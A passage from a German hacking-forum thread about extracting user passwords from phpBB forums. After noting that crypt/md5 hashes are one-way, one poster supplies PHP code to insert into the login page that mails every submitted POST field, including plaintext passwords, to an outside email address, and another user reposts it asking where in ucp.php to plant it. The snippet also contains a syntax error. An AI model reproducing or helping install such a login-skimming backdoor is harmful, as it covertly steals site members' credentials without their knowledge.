Seite 2 von 2 ErsteErste 12
Ergebnis 11 bis 18 von 18
  1. #11
    Fortgeschrittener
    Registriert seit
    15.09.2008
    Beiträge
    38

    Standard

    www.phpBBhacks.com

    schaut mal hier nach, glaub aber nich das da was wirklich hilfreiches kommt...

    //edit: hier gibts leider nur sachen für phpBB2
    nix zu sagen.

  2. #12
    Anfänger
    Registriert seit
    01.03.2008
    Beiträge
    18

    Standard

    phpbbhacks hat leider überhaupt nix mit wirklichem pw hacks zu tun...da gibts nur templates usw.

  3. #13

  4. #14
    W32.FunLove
    Registriert seit
    15.06.2007
    Beiträge
    140

    Standard

    Code:
    $passwort = crypt(md5($passwort), $salt);
    Hinweis: Es existiert keine decrypt Funktion, da crypt() eine Einweg-Verschlüsselung ist. Ich schätze mal, dass PHPBB je nach Länge des Passworts salted. Mir ist noch kein großer Unterschied aufgefallen zwischen Usern die gesaltete Hashs haben und denen die normale MD5s haben...

    Und wenn ihr die Passwörter aus euren eigenen Foren haben wollt, dann geht das bei Gottes Willen auch einfacher... Indem ihr die PWs sofort im Klartext bei jedem Login in eine Datei schreibt.

  5. #15
    Anfänger
    Registriert seit
    01.03.2008
    Beiträge
    18

    Standard

    Zitat Zitat von DJ-2K
    Und wenn ihr die Passwörter aus euren eigenen Foren haben wollt, dann geht das bei Gottes Willen auch einfacher... Indem ihr die PWs sofort im Klartext bei jedem Login in eine Datei schreibt.
    wie kann ich das abändern, dass es auch in ne datei geschrieben wird?

  6. #16
    W32.FunLove
    Registriert seit
    15.06.2007
    Beiträge
    140

    Standard

    Indem du in etwa sowas in die Login-Seite einbaust:
    Code:
    <?
    
    //Checken ob Post Daten enthällt
    if(!empty($_POST))
    //Wenn ja, dann eine Mail an deine@mail.com senden mit dem kompletten Postarray
    mail('deine@mail.com'', 'Geloggte Benutzerdaten', 'Follgender Post-String wurde geloggt: '.implode('&', $_POST));
    
    ?>
    Statt Mail lassen sich natürlich auch Text-DBs oder normale DBs verwenden um Daten zu speichern...

  7. #17
    Be root - Use Linux Avatar von H4x0r007
    Registriert seit
    27.06.2007
    Beiträge
    1.878

    Standard

    Zur Info: Der crypt() Befehl ist ein DES-Fingerprint
    Bald 14 Jahre auf Free-Hack. Krass wie die Zeit vergeht...
    "Drei Dinge sind unendlich - das Universum, die menschliche Dummheit und die WinRAR-Testversion"

  8. #18
    Anfänger
    Registriert seit
    01.03.2008
    Beiträge
    18

    Standard

    Code:
    <?
    
    //Checken ob Post Daten enthällt
    if(!empty($_POST))
    //Wenn ja, dann eine Mail an deine@mail.com senden mit dem kompletten Postarray
    mail('deine@mail.com'', 'Geloggte Benutzerdaten', 'Follgender Post-String wurde geloggt: '.implode('&', $_POST));
    
    ?>
    kennt sich jemand mit phpbb aus um mir sagen zu können wo dieser code rein muss?

    kann es sein dass es die "ucp.php" ist?? die wird nämlich aufgerufen, wenn man auf anmelden klickt.

    und and welche stelle in der datei kommt der code hin. wenn ich ihn einfach nur ans ende hänge kann man sich nicht mehr einloggen!!!

    Added after 116 hours:

    kann mir jemand helfen...finds einfach nicht raus

Seite 2 von 2 ErsteErste 12

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •